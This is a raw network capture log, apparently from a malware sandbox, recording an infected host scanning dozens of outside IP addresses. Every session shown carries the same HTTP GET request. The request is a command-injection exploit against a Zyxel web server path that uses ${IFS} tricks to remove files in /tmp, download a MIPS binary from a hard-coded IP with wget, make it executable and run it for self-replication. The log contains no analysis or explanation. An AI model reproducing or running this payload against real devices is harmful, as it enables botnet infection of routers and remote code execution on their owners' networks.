                                                Jan 12, 2024 18:16:27.556606054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5450192.168.2.2333706136.51.28.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556638002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5451192.168.2.2356552161.69.161.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556683064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5452192.168.2.2358848178.190.229.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556740999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5453192.168.2.2334314155.242.204.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556762934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5454192.168.2.2356110197.178.16.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556799889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5455192.168.2.2345272217.233.100.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556833982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5456192.168.2.234999242.36.46.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556847095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5457192.168.2.2355202183.104.175.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556896925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5458192.168.2.2355888212.77.126.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556950092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5459192.168.2.23603945.66.191.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556969881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5460192.168.2.2353568191.156.80.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557002068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5461192.168.2.2353654160.226.64.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557064056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5462192.168.2.2348008185.240.24.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557111979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5463192.168.2.23508642.94.106.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557137012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5464192.168.2.2345112109.32.246.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557178974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5465192.168.2.2337160130.96.19.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557220936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5466192.168.2.235413040.83.72.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557271004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5467192.168.2.233644472.165.154.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557307959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5468192.168.2.2352990165.53.211.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557336092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5469192.168.2.234100440.61.47.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557400942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5470192.168.2.234670488.184.89.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557435036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5471192.168.2.233456896.203.85.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557467937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5472192.168.2.2340202212.250.156.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557503939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5473192.168.2.2337478197.241.135.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557553053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5474192.168.2.235460061.210.58.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557581902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5475192.168.2.2334648126.207.200.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557626963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5476192.168.2.235327280.65.199.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557681084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5477192.168.2.2344130187.148.49.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557698965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5478192.168.2.235504050.85.3.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557732105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5479192.168.2.234654223.226.228.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557782888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5480192.168.2.2354794208.50.174.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557831049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5481192.168.2.2338152188.122.208.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557873011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5482192.168.2.235786888.165.87.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557904005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5483192.168.2.2346000142.129.170.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557945013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5484192.168.2.2344472217.141.207.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.557955027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5485192.168.2.2358064125.94.72.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558011055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5486192.168.2.2338592136.247.99.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558052063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5487192.168.2.2357878143.75.12.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558094025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5488192.168.2.234592054.65.152.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558116913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5489192.168.2.2355776144.53.161.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558160067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5490192.168.2.234668469.184.252.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558182001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5491192.168.2.2342802221.98.86.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558259010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5492192.168.2.2351790132.242.114.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558305979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5493192.168.2.234153231.249.76.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558373928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5494192.168.2.23368781.92.136.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558373928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5495192.168.2.2341942220.141.181.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558373928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5496192.168.2.234340427.59.213.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558409929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5497192.168.2.233401625.204.180.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558466911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5498192.168.2.2337250103.164.84.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558506012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5499192.168.2.234271827.213.81.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558547974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5500192.168.2.2338264172.184.212.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558583021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5501192.168.2.2351520187.121.157.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558623075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5502192.168.2.23529362.152.49.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558643103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5503192.168.2.235227847.156.229.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558671951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5504192.168.2.235410660.160.160.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558732986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5505192.168.2.2338268200.211.0.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558768988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5506192.168.2.233976832.230.245.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558794022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5507192.168.2.2334380181.252.196.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558835983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5508192.168.2.2353230170.113.160.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558888912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5509192.168.2.235532848.172.174.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558959961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5510192.168.2.233925259.146.81.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558959961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5511192.168.2.233696425.47.202.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.558986902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5512192.168.2.235926869.139.198.55443
                                                TimestampBytes transferredDirectionData
